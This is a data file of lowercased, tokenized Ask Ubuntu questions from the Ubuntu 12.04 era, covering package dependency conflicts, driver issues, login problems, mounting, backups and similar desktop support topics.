140229	do not uninstall flag on apt ?	does the debian/ubuntu package infrastructure has some way of marking packages so that they never get uninstalled , no matter the pinning of other packages ? my problem is that , sometimes , packages installed by puppet ( coming from non-standard repositories , of course ) cause other packages to get uninstalled -- in particular , openssh- { server , client } . the way this happens is that package a and b depend on different versions of package c. if a is installed and one asks to install b , then the version of c changes . the new version of c is incompatible with a , so a gets uninstalled . the funny thing is that the process is then reversed , as , on the next run , puppet notices that a is not installed and tries to install it . so , basically , i want to make sure a never gets uninstalled , which would prevent b from getting installed . that would be reported as an error , making me aware of the issue . if anyone cares , puppet uses the following command to install packages : /usr/bin/apt-get -q -y -o dpkg : :options : := -- force-confold install < package >
140231	hd 3000 graphical artefacts 12.04	i installed 12.04 on a brand spanking new mac mini 5.1 yesterday and earlier today i noticed a couple of artefacts that appeared on random . it is like parts of the screen gets scrambled . and a couple of hours ago the mac freezed completely . is this a driver problem , or part of something more sinister ( hardware , overheating , ram problem ) . 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) example of the problem : http : //i.imgur.com/masfa.png
140234	trying to automount windows fstab	i 'm trying to automount my windows partition with fstab and i just ca n't get it right . i 've done this many times before and for some reason it 's just not working . i add the line like so : /dev/sda /media/3c7ad4f97ad4b0be_ ntfs defaults 0 0 any ideas ? arrg , what a brain fart . supposed to be /dev/sda2 . thanks everyone .
140236	can i access my home pc from the office with ssh ?	i want to use my home pc at my office , without literally taking it to my office . i would like to have a simpler solution than teamviewer , cause i 'm usually using live distros at my work place , so ssh would be a great solution if it actually can do the same job as `` remote desktop '' . if that is n't possible , at least give me the commands to use terminal of my home computer from my office computer .
140243	maas nodes hung at commisioning	got another machine up and running 12.04 . all three of these machines have different cpu a dell amd64 , hp intel , and mx-3203 via . i have a copy of maas and a desktop in all three . no matter which way i furnish maas on any machine the nodes hang with commissioning status . booting the newest machine dell amd64 to maas is actually the worse . one node hangs at commissiong [ mx-3203 via ] and the other node has problem with cobbler server [ hp intel ] . all the while its constantly going into nak bailout . i 've gone through the bugs and tried everything but no fix has worked . ca n't even remove the node to start over . any advice would be helpful .
140246	how do i resolve unmet dependencies ?	how do i resolve unmet package dependencies ? occasionally , when i 'm installing stuff , i get an error like the following : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : package1 : depends : package2 ( > = 1.8 ) but 1.7.5-1ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . how can i resolve this ?
140247	force install apt-get	i tried installing beanstalkd with sudo apt-get install beanstalkd ( also with -f option ) and i get the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these : the following packages have unmet dependencies : beanstalkd : depends : libevent-1.4-2 ( > = 1.4.13-stable ) but it is not going to be installed mysql-server-5.1 : depends : mysql-client-5.1 ( > = 5.1.62-0ubuntu0.10.04.1 ) but it is not going to be installed depends : libmysqlclient16 ( > = 5.1.21-1 ) but it is not going to be installed depends : mysql-server-core-5.1 ( > = 5.1.62-0ubuntu0.10.04.1 ) but it is not going to be installed predepends : mysql-common ( > = 5.1.62-0ubuntu0.10.04.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
140252	which repository do i add to automatically update apache ?	i guess the tittle says it all : i installed apache on my ubuntu ( 11.10 ) , which repository do i add to automatically update it ?
140254	how to install newer versions of the linux kernel ?	a new version of the linux kernel , 3.4 , has been released today . how do i install it ?
140255	how to override the new limited keyboard repeat rate limit ?	i may be an alien around here , but here 's my problem : the speed limit on old ubuntu releases ( = before 11 ) was very very fast . it was really great for me . now , on ubuntu 11 , they may have thought : `` who will ever want that speed ? nobody ! so let 's put the maximum speed to a lower limit '' . it 's so stupid that they tried to narrow down the speed to some other famous os . if linux is more powerful , why remove some of its power ? i do n't get that . so is there any way to override that speed limit and get my keyboard as fast as it is on other previous versions ?
140259	developer tools -- > pascal	desde ya , gracias por dejarme participar . la pregunta es si pueden poner la opcion en herramientas para desarrolladores , la de pascal . hay muchos colegas que lo usamos . seria bueno dejarnos compartir nuestros logros . desde ya , saludo a la comunidad y muchas gracias . alta gracia - cordoba - argentina . of course , thanks for letting me participate . the question is whether they can put the option in the developer tools that of pascal * ( developer tools -- > pascal ) . there are many colleagues who use it . it would be nice to let us share our achievements . of course , i greet the community and thank you very much . alta gracia - cordoba - argentina .
140261	how can i get lightdm to work on ubuntu 12.04 lts 64-bit ?	is there a permanent fix for the looping login problem in lightdm ? i recently installed ubuntu 12.04 64-bit . lightdm wo n't work even though i have n't changed any options ( background , etc. ) . it just throws another login screen at me if i log in . so i did the stuff you 're supposed to . i reconfigured gdm from the terminal and used that to log in , and have been using gdm for ~3 months now . the thing is , i want lightdm back so i can change it to a desktop background i made . ( i have no idea about customising gdm and really do n't care . )
140265	my netbook volume + and volume - buttons stopped working after 12.04 update	that 's it ... brightness buttons are still working great but volume button simply wo n't do anything ... what can i do ? thanks . ps i have an asus 1215n and ubuntu 12.04
140266	linux headers not found	i upgraded to ubuntu 12.04 and the x server is not running anymore . it turned out to be the nvidia driver , so i installed nvidia-current . doing this i got an error message telling me that linux sources are not available . uname -r reports : 2.6.32-34-generic-pae so i tried : sudo apt-get install linux-headers-2.6.32.34-generic-pae but this package does not exist ( anymore ? ) can anybody help me to get the required sources ?
140267	i think someone logged into my computer at work	i went to get breakfast in the cafeteria and when i came back i noticed my lockscreen had n't faded , as if it was accessed in the past 5 minutes . there is the log file snippet for the keyword 'guest ' : ma│may 21 10:24:44 machine-12 groupadd [ 3518 ] : group added to /etc/group : name=guest-ca5vc1 , gid=126 │nd ic│may 21 10:24:44 machine-12 groupadd [ 3518 ] : group added to /etc/gshadow : name=guest-ca5vc1 │co ns│may 21 10:24:44 machine-12 groupadd [ 3518 ] : new group : name=guest-ca5vc1 , gid=126 │ ma│may 21 10:24:44 machine-12 useradd [ 3522 ] : new user : name=guest-ca5vc1 , uid=115 , gid=126 , home=/ , shell=/bin/bash │ ma│may 21 10:24:44 machine-12 usermod [ 3527 ] : change user 'guest-ca5vc1 ' password │ ma│may 21 10:24:44 machine-12 chage [ 3532 ] : changed password expiry for guest-ca5vc1 │ ma│may 21 10:24:44 machine-12 chfn [ 3535 ] : changed user 'guest-ca5vc1 ' information │ ma│may 21 10:24:44 machine-12 usermod [ 3543 ] : change user 'guest-ca5vc1 ' home from '/ ' to '/tmp/guest-ca5vc1 ' │ ma│may 21 10:24:44 machine-12 su [ 3548 ] : successful su for guest-ca5vc1 by root │ ma│may 21 10:24:44 machine-12 su [ 3548 ] : + ? ? ? root : guest-ca5vc1 │ ma│may 21 10:24:44 machine-12 su [ 3548 ] : pam_unix ( su : session ) : session opened for user guest-ca5vc1 by ( uid=0 ) │ ma│may 21 10:24:44 machine-12 su [ 3548 ] : pam_unix ( su : session ) : session closed for user guest-ca5vc1 │ ma│may 21 10:24:44 machine-12 lightdm : pam_unix ( lightdm-autologin : session ) : session opened for user guest-ca5vc1 by ( uid=0 ) i had never used a guest account before so it appears that the guest account had been created when someone logged into it . is this the case ?
140268	boot error when using a usb	i 'm trying to install ubuntu 12.04 using a usb stick . i 'm currently using ubuntu 10.04 . i have a 12.04 lts .iso and tried to make a bootable stick using startup disk creator . the process finishes and when i try to boot a `` boot error '' message is displayed . i do n't know how to use unetbootin . my md5 checksum is ok . i have a c2d 2.66 , 2 gb ram , 320 gb hdd .
140269	how can i extract frames from gif animation image on gimp	i would like to know if there are any scripts or plugins on gimp to extract frames from a gif animation image as individually png images . i recently switched to ubuntu 12.04 from windows . any help would be appreciated .
140276	firefox is always already running after copying .mozilla from a previous version	after i copied my `` .mozilla '' folder in my home folder from my previous version of ubuntu , to restore cache , cookies and plugins , firefox always say there 's another instance running . no other instance is running and reboot does n't work . chmod or deleting some files can help ? also safemode is not working . if i execute firefox as root it starts and all my data is there .
140278	ubuntu 12.04 and virgin media backup & storage	does anyone know how to get virgin media 's ( uk ) backup & storage application to work ( via wine ) in ubuntu 12.04 ? i had it working perfectly well in ubuntu 11.10 but since upgrading to 12.04 the app keeps saying that there 's no internet connection when i try and sign in to the backup & storage app . ca n't understand why it worked in 11.10 and wo n't in 12.04 .
140279	installing grub boot loader freezes when running `` grub-install dummy ''	when installing ubuntu 12.04 server from a disc , my system freezes up after the installation comes to installing grub boot loader , with a 50 % completion bar and the command '' running `` grub-install dummy '' ... below that . i 've tried this installation in both advanced and simple mode and the installation has frozen at this same spot for at least the past 10 attempts . i am partitioning the entire disk and have only selected the sql software to install . i have tried both installing security updates automatically and not . i am using the following machine : hp p2-1033w processor : amd fusion e-300 ( 1.3ghz ) processor core : dual-core memory : 3gb 3gb max memory : 16gb memory slots : 2 ( occupied ) graphics : ati radeon hd 6310 hard drive : 500gb sata ( 7200rpm ) optical drive : supermulti dvdâąrw sound : realtek alc662 realtek alc662 network : 10/100 base-t is there a method to getting to the grub to install , without freezing ? log files : these were found together may 22 02:20:13 ubuntu kernel : [ 2107.477308 ] ntfs driver 2.1.30 [ flags : r/o module ] . may 22 02:20:13 ubuntu kernel : [ 2107.533946 ] qnx4 filesystem 0.2.3 registered . may 22 02:20:13 ubuntu os-prober : debug : running /usr/lib/os-probes/50mounted-tests on /dev/sda1 may 22 02:20:14 ubuntu 50mounted-tests : debug : mounted using grub fat filesystem driver may 22 02:20:14 ubuntu 50mounted-tests : debug : running subtest /usr/lib/os-probes/mounted/10freedos may 22 02:20:14 ubuntu 10freedos : debug : /dev/sda1 is a fat partition ( mounted by grub ) may 22 02:20:14 ubuntu 50mounted-tests : debug : running subtest /usr/lib/os-probes/mounted/10qnx may 22 02:20:14 ubuntu 10qnx : debug : /dev/sda1 is not a qnx4 partition : exiting may 22 02:20:14 ubuntu 50mounted-tests : debug : running subtest /usr/lib/os-probes/mounted/20macosx may 22 02:20:14 ubuntu macosx-prober : debug : /dev/sda1 is not an hfs+ partition : exiting may 22 02:20:14 ubuntu 50mounted-tests : debug : running subtest /usr/lib/os-probes/mounted/20microsoft may 22 02:20:14 ubuntu 20microsoft : debug : /dev/sda1 is a fat partition ( mounted by grub ) may 22 02:20:14 ubuntu 50mounted-tests : debug : running subtest /usr/lib/os-probes/mounted/30utility may 22 02:20:14 ubuntu 30utility : debug : /dev/sda1 is a fat partition ( mounted by grub ) this is all one segmenet here : may 22 02:23:26 ubuntu ubiquity [ 4062 ] : traceback ( most recent call last ) : may 22 02:23:26 ubuntu ubiquity [ 4062 ] : file `` /usr/lib/ubiquity/ubiquity/misc.py '' , line 151 , in grub_options may 22 02:23:26 ubuntu ubiquity [ 4062 ] : for disk in p.disks ( ) : may 22 02:23:26 ubuntu ubiquity [ 4062 ] : file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 156 , in disks may 22 02:23:26 ubuntu ubiquity [ 4062 ] : return sorted ( os.listdir ( devices ) ) may 22 02:23:26 ubuntu ubiquity [ 4062 ] : oserror : [ errno 2 ] no such file or directory : '/var/lib/partman/devices'
140285	xfce 4 ( xubuntu ) : how to minimize windows on double-click of the window frame ?	is it possible with xfce 4.8 ( xubuntu 12.04 ) to have windows minimized on double-clicking the window frames ? so , for example , if file manager is open , to just double-click on the window frame and the the window `` disappears '' ( is minimized to the panel ) . it would be great if there was a `` simple '' solution not having to install heavy additional packages .
140287	how can i make `` sed '' be specific when looking for a phrase	i am using `` sed '' to find and delete a phrase in a text file . it works great , but i ca n't seem to make it get specific . for example , this is my `` sed '' command : sed -i 's/foobox.com// ' ~/foo/fooman.txt i am looking for 6 specific phrases in ~/foo/fooman.txt they are : dl-web.foobox.com dl.foobox.com foobox.com fooboxdownloads.com www.foobox.com www.fooboxdownloads.com when i run sed -i 's/foobox.com// ' ~/foo/fooman.txt it finds every enty with `` foobox.com '' and deletes it , but leaves the left overs there ( i.e . `` dl-web . '' `` dl . '' `` downloads.com '' `` www . '' `` www.downloads.com '' . can i make `` sed '' use a `` wildcard '' when searching for the phrase ? if so , where does one put the wildcard ( i have already tried ( * ) which does not work ) . if not using a wildcard , can `` sed '' use some other method to get specific ( dl-web.foobox.com ) instead of just being general ( foobox.com ) ? id `` sed '' ca n't do the trick , is there a nother ci command that would do the trick ? thanks for any help , i am new to linux and writing ci commands .
140290	how to dial modem without sudo	i am using ixconn as modem manager because it has many more features than the default network manager . but it can not be used without root privileges ( i.e. , sudo ) . how can i use ixconn to dial my modem , without sudo ?
140302	will `` standard '' i386 release of ubuntu work without any mods on raspberry pi ?	can i install ubuntu 12.04 on raspberry pi , model b ? i need a small , cheap pc for xbmc media center and a browser to connect to my pc . i need a wifi , so i need at least 2 usb ports . i have set my eyes on raspberry pi , but not sure wheather it will provide . please , provide any info on the topic , or alternatives .
140304	is there now any way to convert mp3 files to m4a or aac 192kbit ?	since about two years now i am trying to find a way to convert high quality mp3 files to m4a or aac files with a fixed bitrate 192k . please do n't suggest using another format - i thought this through as far as it goes . the problem here is : ffmpeg obvioulsy ca n't convert to a higher bitrate than 152k . even when it says it does so the resulting files still have 152k instead of 192k . ffmpeg also has/had a bug not writing the bitrate into the audio file tags which means when testing you have to calculate the bitrate manually by dividing the filesize by the length of the audio in seconds ( resulting in 152k - see above ) choosing faac as converter gets me the same results other programs do n't work reliably ( see this thread howto convert audio files to *.m4a ? ) i know that this is not an original new problem but i am wondering if there is still no way to convert with ubuntu/kubuntu 12.04 after a lot time passed and i ca n't find some of the bug issues mentioned in the other thread anymore . so : is there a solution after all ?
140305	cron not able to succesfully change background	i 'm running 12.04 with a custom xml background ( modification on day of ubuntu ) that changes based on time of day . i 've noticed that there 's a significant delay between when the changes are scheduled to take place in the xml file and when they actually show up on the background . i 've also noticed that when i resume from suspend i do n't get the correct background image either . i 've found that cycling the wallpaper manually will fix this , and i 've written a script to automate the process . if i execute the script manually it works fine . however , when i schedule the script to run in cron , cron does n't change the background . to make sure that the script was being run properly by cron , i had it create a directory in my home folder after running the background change , and the directory is created successfully , so i know cron is running and executing the script . my script : # ! /bin/bash sleep 5 gsettings set org.gnome.desktop.background picture-uri file : ///home/zak/pictures/wallpaper/dou2.xml sleep 1 gsettings set org.gnome.desktop.background picture-uri file : ///home/zak/pictures/wallpaper/dou.xml sleep 1 mkdir /home/zak/iscronworking exit is cron just not able to access gsettings ? the job is on my user crontab so it should n't be running as root .
140306	how to make ik multimedia stealth plug work on ubuntu ?	i used wine and i have amplitube set up on my labtop but i ca n't get the stealth plug drivers to work on ubuntu . what should i do ?
140307	lubuntu keyboard shortcut for menu	i 'm using lubuntu on an older machine , and i 'm having trouble finding information on keyboard shortcuts . is there a shortcut for opening the navigation menu ? i expected that the windows key might work , but no luck . more generally , is there a reference for existing lxde shortcuts ?
140310	are all of the backup files & folders of encrypted /home folder also encrypted on the backup hdd ?	in the past i routinely backed up my entire unencrypted /home folder with luckybackup ( gui for rsync ) to an external hdd . i 've had no problems seeing and manipulating the backed up data when accessing the external backup hdd from a livecd , another ubuntu computer or even win7 . i recently installed ubuntu 12.04lts on a new ssd and decided to enable /home folder encryption during installation . now , when i do a backup of /home to my external hdd using luckybackup , i can only see the backed up data on the hdd when i am in logged in to ubuntu 12.04 . when i try to look at or manipulate the data from a livecd , another ubuntu computer or win7 the data is not accessible and has a user 1000 permission set which can not be changed . i conclude from this , that all of my backed up data is now saved on my external hdd in encrypted form . i did not expect this , nor do i want it . i want the backed up data saved in unencrypted format so i can access it from other os 's . question : is there a way to backup an encrypted /home partition 's data in an unencrypted format , read/copy/executable by any other os ?
140311	bad anti-aliasing in some applications	there was an update a few weeks ago that seemed to mess with anti-aliasing in some applications . firefox , thunderbird , and the text in some apps such as mousepad and leafpad ( but not the rest of the window ) are affected , whereas chrome and everything else seems to be just fine . attached are two screenshots showing the difference between rendering in firefox and chrome . the anti-aliasing settings are the same as they 've always been , which have worked just fine - full hinting , rgb sub-pixel order . i 'm really not sure what 's going on and am thinking that it might be faster to fix this problem by re-installing , but is there anything i can try first as re-installing is the last thing i want to do ? i 'm running xubuntu 12.04 .
140312	how to remove error message when installing new softwares	first i had installed oracle java via terminal . its get en error . i do n't remember the error message . but other java app are working example netbeans , eclipse . the main problem is when i installed any new softwares via terminal or ubuntu software center , first i get this error . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how to remove this message and and reinstall java properly . i 'm using ubuntu 12.04 edit when i trying to remove the sun java ( tm ) development kit ( jdk ) 7 i got this error message . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 189962 files and directories currently installed . ) removing oracle-java7-installer ... update-alternatives : error : unknown argument `cdrom' dpkg : error processing oracle-java7-installer ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 no apport report written because maxreports is reached already downloading ... -- 2012-05-21 22:54:41 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 222.165.168.249 , 222.165.168.202 connecting to download.oracle.com ( download.oracle.com ) |222.165.168.249|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-05-21 22:54:42 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 173.222.122.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |173.222.122.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-05-21 22:54:43 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |222.165.168.249|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % 152k=0.03s 2012-05-21 22:54:43 ( 152 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer
140317	unable to load firefox addons website on firefox !	this is strange but since i have updated to ubuntu 12.04 lts from 11.10 , some websites simply refuse to open in firefox browser . i have not been able to install any addon since the site itself does not load . another important site i am unable to open is wordpress.org . i have tried opening them in chromium and they are working just fine ( so the network settings are fine , i guess ) . the problem seems to be limited to firefox only and i want to resolve this issue than moving to another browser . firefox is the only browser i intend to use .
140320	ubuntu lost my external monitor	i installed ubuntu on an old dell latitude d630 laptop from a usb stick . i had an external monitor hooked in at the time , and during the installation , ubuntu found my external monitor without a problem . and i continued to install ubuntu . great ... now , i started using my installed ubuntu , but i did n't restart my computer . i had setup my external monitor so that instead of mirroring my laptop display , it was an extension . everything so far was fine . then as some point , my external monitor went blank . i had to power cycle my laptop . on the first power cycle , i saw what looked like 'frozen white noise ' on both displays . i also noticed that my ubuntu install-usb stick was still inserted into my laptop . so , i pulled that out and restarted . this time , my laptop booted up properly , but i lost my external monitor use . when i try to detect the monitor , it never appears . could anyone help me get my monitor back on line ? here 's the thing , i went back to the installation process found on my usb stick . the installation program can find the external monitor fine . so i do n't know what is going on here . thanks !
140322	is it possible to query maximum ram my mobo takes ?	is it possible to query through terminal how much ram my motherboard can take ? i 'm looking to see if i can even upgrade .
140329	songs & instrument game alternative ( stepmania & guitar hero )	i am looking in ubuntu for alternatives to stepmania an guitar hero . i used stepmania with wine but i heard there was a linux version for it . same for guitar hero where i can connect the playable guitar and enjoy . are there an alternative for this 2 and if so which ones .
140332	how to tell update manager to do updates on a specific date and time	i want to tell update manager to check for updates every sunday at around 4 pm . how can i achieve this ?
140336	screen dim buttons not working on toshiba satellite	since i have upgraded from the last 11.10 to 12.04 the screen dim buttons ceased to function . as i see this is due to the replacement of the 3.0 kernel with the 3.2 starting the system with the 3.0.19 kernel screen dim works . anyone having similar experience ?
140342	can not update ubuntu 9.04	i am using ubuntu 9.04 and having problem updating . when i start the update manager , i get a message saying : could not download all repository indexes the repository may no longer be available or could not be contacted because of network problems . if available an older version of the failed index will be used . otherwise the repository will be ignored . check your network connection and ensure the repository address in the preferences is correct . then i close it and click upgrade , and i get this error : could not find the release notes . the server may be overloaded . what can i do to solve this problem ?
140343	login screen ubuntu 12.04 not showing user 's desktop	i installed ubuntu 12.04 ( x64 ) and was really enjoying it , but it was a little too slow on my machine , so i 've reinstalled with the x32 version ( hopefully that terminology 's correct ) . the only thing i did differently was to put the /home directory onto its own partition and set encryption of same . when i used the x64 version , the login screen would change to show each user 's desktop wallpaper , but it no longer does this ... is this a bug ? or something wrong with x32 ? or is it something that i did when i partitioned and encrypted /home ?
140346	how do disable tap-to-click while typing ?	running kubuntu 12.4 on a thinkpad 410s . i 'm hoping to disable the tap-to-click mechanisms while i am typing , similar to what i can do in windows . so far i have only been able to figure out how to : disable tap-to-click completely ( in the the kde touchpad control ) disable the entire touchpad ( not just tapping , even moving ) in touchpad management for n seconds after typing . looking for somewhere in between . i want the tap-to-click action disabled for n seconds after typing , but want the touchpad to continue to move the mouse earlier .
140348	which linux distribution on my netbook	i have an acer aspire one netbook and i want run linux on it , but i do n't know which distribution i should choose . it has a 1.66 ghz intel atom processor and about 1 gb ram , so it should n't be too heavy .
140360	kvm kernel module error	i just installed qemu and ran qemu-system-i386 -hda ubuntu32 -cdrom ~/downloads/ubuntu-12.04-desktop-i386.iso -m 1024 -boot d and got some errors could not access kvm kernel module : no such file or directory failed to initialize kvm : no such file or directory back to tcg accelerator . anyone know why this happens ?
140361	how to become root ?	i have been trying for a week and a half trying to become root so i can change the motd for an assignment and i have had no luck . can someone break it down into linux for dummies style please . i have done every update for ubuntu 12.04 do not know if this why it is giving me a hard time ? thank you in advance for your help .
140363	avoid windows ( or more precisely its icons representation ) folding when press alt-tab	in 12.04 when i press alt-tab and had opened more than one ... lets said firefox windows , i just can see one firefox icon that represent all the firefox windows i have open . how can i get one icon per windows instead of one icon per windows of the same type when i press alt-tab ?
140364	thunderbird script to disable option : `` delete message on server ''	when i first started using thunderbird . i overlooked that thunderbird deletes message ( on server ) after 14 days . it gave me a hell of a shock . when i checked my mail via web-browser ( luckily hot-mail put them in my deleted folder . phew ) . when i updated 11.10 to 12.04 via clean install . i forgot this setting . almost removed them again i want to know if there is some command that can disable this settings for all my accounts in thunderbird . cause i have a install-all-12.04.sh script that i want to put it in . with the rest of my codes . and in the future help some noobs ; )
140368	return hud key from mod 2 + alt l back to alt l	i was fooling around in the keyboard shortcut section , and accidentally changed the hud 's shortcut from alt l to mod 2 + alt l. now , whenever i hold and even press the alt key , hud will pop up . i do n't have the option to hold the alt key , and then press f4 to close a window . how can i get this back to normal ? every time i try too , i can never get the shortcut back to just alt l .
140370	why is it so difficult to find instructions for upgrading from 11.10 to 12.04 ?	my update manager had a link to upgrade my entire system displayed above the usual list of recommended patches/updates , so i thought i 'd save time and opt for that upgrade . unfortunately , i lost my connection to the server ( so it seemed ) half-way through . it looked like it managed to download everything , but then it simply hung for hours and now that i 've rebooted i no longer see the `` offer '' to upgrade to 12 - yet i 'm still running 11 . i ca n't find my way to anything - either locally on this host or on the ubuntu web site . the major page for 11.10 offers a link to guide one to upgrade to it , not past it , yet the corresponding `` major page '' for 12.04 does n't include similar , or look anything like its predecessor . in fact , it seems rather half-baked . obviously there are lots of folks suffering with some sort of problems upgrading , but so far i 'm not finding any useful info wading through their threads , either . this has wasted an inordinate amount of time already , with no sign of my even getting near the scent , much less treeing the varmint . if i was an apple baby i 'd have given up long ago !
140371	ubuntu 12.04 logon issues on dell mini 10 gma 500	i recently upgraded my mini 10 to ubuntu 12.04 and have been having the following problems . on a normal startup , the computer boots to a black screen . if i press f6 on startup and boot from the non recovery , i will get to the user selection screen . but , it by default wants to be in unity 3d so it only takes up the top half of the screen , bottom half is black . my understanding is that this is because its in unity 3d not unity 2d . the file /etc/lightdm/lightdm.conf reads as follows : [ seatdefaults ] autologin-guest=false autologin-user= autologin-user-timeout=0 autologin-session=lightdm-autologin user-session=ubuntu-2d greeter-session=unity-greeter i am not sure what to do next . any help would be great . thank you
140373	put eclipse menubar in globalmenu ?	i noticed that when i installed eclipse ( from the repo ) that the file , edit , etc menus are not in the global/appmenu bar . is there a way to fix this ?
140379	how can i track a bug that caused a crash and was reported via apport / whoopsie ?	it used to be that when a program crashed , especially when a user was using a pre-release of ubuntu , apport could be used to open a bug report . the user could then track the bug , see if it affected others , help fix it , etc . as of precise 12.04 , this behavior and workflow changed . as i discovered in bug # 993450 âapport fails to submit bug reportâ , by default apport no longer opens a bug report ( and it is awkward but not impossible to get it to do so ) . at the same time people are noticing a new `` whoopsie '' process , as described at what is the 'whoopsie ' process and what does it do ? . after some more googling , i dug this blueprint up , which describes the whole process : errortracker - ubuntu wiki . ( it did n't mention whoopsie or daisy , so i added them - please correct me if i got it wrong ) . wow - this sounds like great work to streamline and improve the crash reporting process . i 'm left with this question : how does a user learn what the status of the problem is ? the blueprint now has this requirement the user should have some way to check back on the status of their crash report ; e.g . have some report id they can look at to see statistics and/or any associated bug # . e.g . provide a serial number at time of filing that they can load via a web page later on . which seems unimplemented . is there anything available in the meantime ? and how does a developer get into the game ? going to https : //daisy.ubuntu.com just provides an `` incorrect content-type '' error message . finally , i suggest documenting the apport behavior changes in the release notes . it should be of interest to anyone who has been trying to help out ubuntu .
140380	segment fault error when try to scan host by ettercap	i wan na scan host via ettercap in ubuntu 11.04 but it return following error ooops ! this should n't happen ... segmentation fault ... please recompile in debug mode , reproduce the bug and send a bugreport
140381	how can i see what files have synced and how do you restore lost files ?	having looked through everything all i need to know is how does ubuntu one work ? how can i see what files have synced and how do you replace them on the computer if lost ( restore ) .
140386	how to edit startup applications from recovery mode ?	i accidentally messed up ubuntu by adding a startup application that causes it to freeze after logging in , how can i change this through recovery mode ? thanks !
140390	how do i switch users ?	how does one switch users in unity ? ( i.e. , in the gui , not sudo . ) i really want to launch another x session using a different wm , without abandoning the current one .
140395	turn off spellcheck for cyrillic input in empathy	i have spell check enabled for the english keyboard , but when i use serbian cyrillic keyboard , i want that feature turned off , because then all the words get underlined like i spelled them wrong how do i do this ? thanks somehow now it works just as i want in firefox , but in empathy it still marks all the cyrillic words , and i just want it to mark misspelled english words here 's an example firefox ( good ) : empathy ( bad ) :
140396	how do i install crashplan with a unity launcher icon ?	i just installed crashplan for linux . after installing , i deleted the installer folder and files , and the icon sitting on my desktop ( after dragging it to the launcher ) . i rebooted , now the launcher icon is gone and i ca n't find any way to start the crashplan desktop application . how do i get the launcher back so i can start the program ?
140399	can not mount dvd/cd in ubuntu 10.04	i am trying to make my own game server of perfect world and for that i need to mount the server files that are on my dvd . but i am using the command mount/dev/cdrom/cdrom it is not mounting saying already exists . i tried making a symbolic link.. but ca n't really find what to do . please help .
140406	how do i update to ubuntu 12.04 if update manager does n't prompt it ?	i was updating to ubuntu 12.04 and i lost my wireless connection . i turned off my computer and got to a better connection and now my `` update manager '' does not prompt for the upgrade .
140409	error : no root filesystem defined when trying to install	this is my first time installing ubuntu but i am having problems installing it on my lenovo g570 laptop . i have downloaded the 12.04 desktop version , and booted it successfully , but when i choose to install ubuntu , and i choose to install side-by-side with windows 7 , the cd ejects and i need to reboot . when i choose advanced partitioning , an error comes up , no root filesystem defined and i am unsure as to how to continue . i 've tried wubi , but it requires a long download which i can not complete due to a slow internet connection . please tell me how i can resolve this issue .
140410	sluggish switching of desktop environments in ubuntu 12.04	whenever i switch from unity to gnome shell or classic gnome , it sometimes takes what seems to be an awful long time to get to the new desktop . if i remember correctly , one time it took over 2 mins . i realize that whenever one is asking the system to make a somewhat radical change , it may take some time , but 2 mins is a little excessive .
140418	brasero asking me to create an image	i want to burn some data onto a cd . i have added the folder i want to burn to the project and inserted a blank cd . however , when i press `` burn.. '' i am asked to chose a location to create the image file `` brasero.iso '' . i do n't understand..
140420	unable to find cgi-bin directory	i am following this tutorial and it is asking me to save proxy.cgi in the /var/www/cgi-bin directory . there is no directory in www with the name cgi-bin . do i need to create a directory there ? i think the tutorial 's guidance is for a rpm-based linux distribution , but i may be wrong .
140425	is there a way to change my home folder to encrypted after upgrading to 12.04	i somehow missed the option to encrypt my home folder when upgrading to 12.04 . it was not encrypted in 11.10 . how might i do so without a re-installation ? or can i ? i 'm fairly new to ubuntu so please dumb it down for me .
